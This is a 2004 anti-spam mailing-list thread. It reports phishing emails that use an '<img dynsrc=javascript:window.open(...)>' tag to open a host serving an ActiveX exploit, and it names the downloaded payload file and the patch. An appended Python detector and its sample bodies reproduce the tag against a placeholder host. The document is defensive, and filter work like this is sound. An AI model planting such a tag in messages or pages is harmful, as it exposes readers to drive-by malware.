Good tip! This is what the web page is using:
http://netsecurity.about.com/cs/generalsecurity/a/aa021504.htm to download a file it creates called C:\Program Files\Internet Explorer\Iesearch.exe by downloading and renaming the file http://68.192.132.122:8067/mstasks.dat, which my latest Trend Micro OfficeScan has never seen before.

Here's a copy of the original 'sploit: http://www.securityfocus.com/archive/1/358913 and yes, there is a patch. It is: http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx which was part of the April Critical Patch update.

Oh, and the website is hosted at: ool-44c0847a.dyn.optonline.net so this is a zombie running a webserver on somebody's home machine.

Andrew 8)

-----Original Message-----
From: Adrian Hauri [mailto:[EMAIL PROTECTED]
Sent: Tuesday, April 20, 2004 9:34 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Declude.JunkMail] Dangerous img dynsrc tag in body

Just for your information:

We received a couple of Spam emails (fake ebay notifications) with the following dangerous tag in the body:

<img dynsrc=javascript:window.open('http://68.192.132.122_:8067/')>

(I added the _ at the end so it doesn't harm anyone)

As soon as you open the email, the window will open the url. The website hosts a dangerous ActiveX script that gets executed as soon as you open the website. The Antivirus (F-prot, AVG, McAfee) did not find a virus in the email and let it through because it's just a html tag.

I added a body filter that searches for "<img dynsrc=javascript:window.open(" and trashes all emails based on that.

Adrian

---
[This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)]

---
This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type "unsubscribe Declude.JunkMail". The archives can be found at http://www.mail-archive.com.
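As an added example (not Adrian's Declude filter and not part of the original thread), here is a standalone Python check for the pattern the thread describes. A literal search for "<img dynsrc=javascript:window.open(" misses trivial variants (upper case, extra whitespace, a quoted attribute value, other attributes before dynsrc), so this version matches any <img> whose dynsrc attribute is a javascript: URL. The sample bodies and the example.invalid host are constructed for the demonstration.

```python
import re

# Matches an <img> tag whose dynsrc attribute starts with "javascript:".
# Tolerates case, whitespace around "=", optional quoting, and other
# attributes placed before dynsrc inside the same tag.
DYNSRC_JS = re.compile(
    r"<img\b[^>]*?\bdynsrc\s*=\s*['\"]?\s*javascript\s*:",
    re.IGNORECASE | re.DOTALL,
)


def has_dynsrc_script(body: str) -> bool:
    """Return True when an HTML body carries an <img dynsrc=javascript:...> tag."""
    return DYNSRC_JS.search(body) is not None


# Constructed sample message bodies (not real mail); example.invalid is a placeholder host.
SAMPLES = {
    # the exact form reported in the thread
    "literal": "<p>eBay notice</p>"
               "<img dynsrc=javascript:window.open('http://example.invalid:8067/')>",
    # mixed case, spaces around "=", quoted value: the literal filter would miss this
    "quoted": "<IMG  DYNSRC = \"JavaScript: window.open('http://example.invalid/')\" width=1>",
    # attributes reordered so dynsrc is not right after <img
    "reordered": "<img width=1 height=1 dynsrc='javascript:window.open(\"http://example.invalid/\")'>",
    # ordinary image, must not be flagged
    "benign": "<img src=\"http://example.invalid/logo.gif\" alt=\"logo\">",
    # plain text, must not be flagged
    "plaintext": "Hello, your invoice is attached. Thanks.",
}


def classify(samples=SAMPLES):
    """Map each sample name to whether it would be caught by the check."""
    return {name: has_dynsrc_script(body) for name, body in samples.items()}


if __name__ == "__main__":
    for name, flagged in classify().items():
        print(f"{name:10s} -> {'TRASH' if flagged else 'pass'}")
```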
